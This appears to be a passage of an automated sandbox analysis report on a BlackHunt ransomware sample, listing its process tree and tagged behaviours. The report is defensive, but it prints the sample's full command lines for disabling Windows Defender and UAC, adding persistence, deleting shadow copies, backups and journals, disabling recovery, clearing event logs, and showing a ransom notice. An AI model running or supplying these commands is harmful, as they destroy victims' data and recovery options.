901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 111 PID 3448 wrote to memory of 3100 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 115 PID 3448 wrote to memory of 3100 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 115 PID 4968 wrote to memory of 1716 4968 cmd.exe 114 PID 4968 wrote to memory of 1716 4968 cmd.exe 114 PID 3040 wrote to memory of 2096 3040 cmd.exe 117 PID 3040 wrote to memory of 2096 3040 cmd.exe 117 PID 2384 wrote to memory of 3364 2384 cmd.exe 118 PID 2384 wrote to memory of 3364 2384 cmd.exe 118 PID 3448 wrote to memory of 4860 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 119 PID 3448 wrote to memory of 4860 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 119 PID 3448 wrote to memory of 1008 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 123 PID 3448 wrote to memory of 1008 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 123 PID 1548 wrote to memory of 432 1548 cmd.exe 120 PID 1548 wrote to memory of 432 1548 cmd.exe 120 PID 3448 wrote to memory of 2044 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 124 PID 3448 wrote to memory of 2044 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 124 PID 1908 wrote to memory of 3868 1908 cmd.exe 173 PID 1908 wrote to memory of 3868 1908 cmd.exe 173 PID 3448 wrote to memory of 4788 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 127 PID 3448 wrote to memory of 4788 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 127 PID 3448 wrote to memory of 4580 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 129 PID 3448 wrote to memory of 4580 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 129 PID 3448 wrote to memory of 2080 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 132 PID 3448 wrote to memory of 2080 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 132 PID 3448 wrote to memory of 2112 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 134 PID 3448 wrote to memory of 2112 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 134 PID 3448 wrote to memory of 2784 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 136 PID 3448 wrote to memory of 2784 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 136 PID 3448 wrote to memory of 2664 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 144 PID 3448 wrote to memory of 2664 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 144 PID 3448 wrote to memory of 4756 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 143 PID 3448 wrote to memory of 4756 3448 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe 143 PID 3992 wrote to memory of 1976 3992 cmd.exe 179 PID 3992 wrote to memory of 1976 3992 cmd.exe 179 PID 3100 wrote to memory of 3580 3100 cmd.exe 141 PID 3100 wrote to memory of 3580 3100 cmd.exe 141 PID 2108 wrote to memory of 2280 2108 cmd.exe 137 PID 2108 wrote to memory of 2280 2108 cmd.exe 137 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe"C:\Users\Admin\AppData\Local\Temp\901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3448 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:3868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4788
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4580
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2080
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:8300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2784
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:8908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:8928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:5064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:8528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4308
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1028
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:6736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:6564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe" /F2⤵
- Modifies registry class
PID:412 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\901e3c66ecbf42b99886bbffac0c15e0326c368fe4188afede1ef463412f14d0.exe" /F3⤵
- Creates scheduled task(s)
PID:6204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3636
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5012
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4696
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies Windows Defender Real-time Protection settings
PID:3868
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4048
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:9184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:556
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5072
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2712
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3832
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:7524
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:6576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:9120
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:6684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:6168
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:5928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4452
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8684
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5828
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:10184
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:9252
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6548
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:11996
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:9080
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4496
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:10480
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:5900
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:10500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:6620
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:4560
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:10384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:11784
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:9620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2604
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:8792
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:5816 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6444
-
